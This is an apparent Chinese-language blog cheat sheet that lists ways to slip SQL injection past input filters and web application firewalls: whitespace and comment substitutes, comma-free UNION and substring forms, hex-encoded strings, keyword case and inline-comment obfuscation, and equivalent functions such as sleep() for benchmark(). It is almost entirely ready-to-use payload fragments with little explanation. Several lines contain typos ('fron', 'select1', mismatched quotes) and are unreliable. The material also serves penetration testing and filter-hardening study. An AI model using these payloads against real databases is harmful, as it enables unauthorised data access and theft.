常见绕过方式
1、空格绕过
格式 : %20 %09 %0b %0c %0d %00 /**/ /*!*/ +
如: '0'+'0'
select * from user where name=admin union/**/select ...
2、括号()绕过
格式: ()
如: select (user());
select (database());
select (user()) from (tables) where (1=1) and (2=2);
3、逗号过滤
格式1: from 1 for 1
substr(database(),1,1) ===== select substr(database()fron 1 for 1)
格式2:join
union select 1,2======union select * from (select1)a join (select2)b;
4、or、and、xor、not
格式: and &&
or ||
xor |
not !
5、注释符绕过
格式: # %123 -- - --+ --
or '1'='1’ and '1'='1‘ //逻辑词闭合
6、引号绕过
table_schema=’secturity'=====table_schema=0x73656375727479 // ’secturity' 转换为 十六进制(0x)
7、关键字绕过
union ======= uNion //大小写绕过
union ======= /*!union*/ select ... //内联注释
union ======= ununionion //编码绕过
or 1=1 ====== url,ascii,hex,unicode //编码绕过
//等价函数
hex(),bin() ==== ascii()
sleep() ==== benchmark()
concat_ws ==== group_concat()
@@user ==== user()
@@datadir ==== datadir()
8、正则绕过
union /* '+ 'a' *100000+' */ select
标签:方式,database,union,user,格式,绕过,select From: https://www.cnblogs.com/cshut/p/16859147.html